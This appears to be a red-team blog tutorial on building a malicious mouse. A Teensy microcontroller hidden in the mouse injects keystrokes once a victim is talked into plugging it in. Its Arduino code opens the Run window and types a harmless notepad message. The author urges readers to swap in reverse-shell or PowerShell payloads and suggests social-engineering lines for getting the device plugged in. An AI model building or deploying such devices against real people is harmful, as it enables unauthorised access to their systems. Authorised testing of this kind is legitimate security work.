The Red Team's Ratatouille

:begin Introduction

The concept of Plug and Prey: Malicious USB Devices device by Irongeek at Shmoocon, bad usb by Karsten Nohl at Blackhat or the Rubber ducky by Hak5, these are super interesting concepts that are leveraged at every Red Team enagement that is conducted by a Red Team Operator. Any such exploitation requires good amount of social engineering. I recommend people should have exhausted every possible trick in the book to compromise from the external network of the organization before attempting to breach physical security.

Use of malicious USB is quite obvious, and you can’t actually walk up to the victim and ask him to plug in the USB. Ok! So you succeed in social engineering him to allow you to plug in the USB drive? Good luck explaining the command prompt opening, random characters getting entered and the command prompt closing in its own. Yes! Even if it takes half a second for the execution, human eye can see at a speed of 60 fps, according to research ofcourse. Obviously, you are a success if some idiot manages to leave his system unlocked (which you’ll have to lurk around and wait for).

Malicious mouse attack, or what I like to call The Red Team’s Ratatouille gives you the perfect excuse as an attacker. 0 wait time. Just go upto your victim and ask, “Can I check if this mouse is working on your system?” Assuming you are a red teamer and know how to speak to people, you’ll end up with a system in your credential bank. :) From here, Happy hacking!

:begin Technical Details

This attack doesn’t vary a lot from bad USB w.r.t concepts. We only stuff our microcontroller device into the body of a mouse.

:goto Ingredients


  • Teensy 3.2 Microcontroller

  • Arduino IDE

  • Teensyduino software

  • Basic programming-fu

  • Mouse that need not necessarily work

  • MicroUSB cable (To connect the teensy to the USB, preferred color would be the black)

  • Basic Social Engineering skills

:goto Cooking

:goto Building an exploit

First and foremost, let us not forget - USBDriveBy code that is written by Samy Kamkar. Quite a lot of people utilize this code with their teensy device. Another tool used is the Social Engineering Toolkit, which gives you a powershell payload that you would require to execute to pwn the system.

But, what is a hacker without the knowledge of what he does? So, before starting, hope you know some basic Arduino Programming. This sample code will open notepad and type You have been Hax0red on it. To begin, we build the algorithm that we want to program (Manual method).

1
2
3
4
5
Press Win+R code and open the "Run" window.
Release the keys.
Type the string "notepad" into this window.
Press enter.
Type the string "You have been Hax0red".

Base Teensy Code

1
2
3
4
5
void setup() {
}
void loop() {
}

Run Window Function

1
2
3
4
5
6
7
8
9
10
11
void runTheExe(char *SomeCommand)
{
Keyboard.set_modifier(128); # Set modifier key - Windows
Keyboard.set_key1(KEY_R); # Set key 'r'
Keyboard.send_now(); # Action of pressing of Windows + R
Keyboard.set_modifier(0); # Setting modifier to 0
Keyboard.set_key1(0); # Setting key to 0
Keyboard.send_now(); # Action of releasing the keys
delay(1500); # Delay to let you see what happens. Change this to a lower value during real operations.
ascii_println(SomeCommand); # send a string as input
}

As can be seen above, we will now need to send a string (in this case- ‘notepad’) and it would be run from the Run Window. Accordindly, we define the setup() function now.

1
2
3
4
5
6
7
void setup() {
delay(100);
runTheExe("notepad"); # We open notepad.
delay(100); # Only to help you feel something is being done
//Enter the payload below
ascii_println("You have been Hax0red"); # We type the string that we wanted
}

Now ofcourse, this could be weaponized in more harmful ways, which I would leave to you Red Teamers out there to attempt. I love to have my Teensy with a reverse shell code. This code can be saved on a raspberry pi and weaponized everytime, depending on your client environment.

Full Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#define ascii_println Keyboard.println
void setup() {
delay(100);
runTheExe("notepad");
delay(100);
//Enter the payload below
ascii_println("You have been Hax0red");
}
void loop() {
}
void runTheExe(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_println(SomeCommand);
}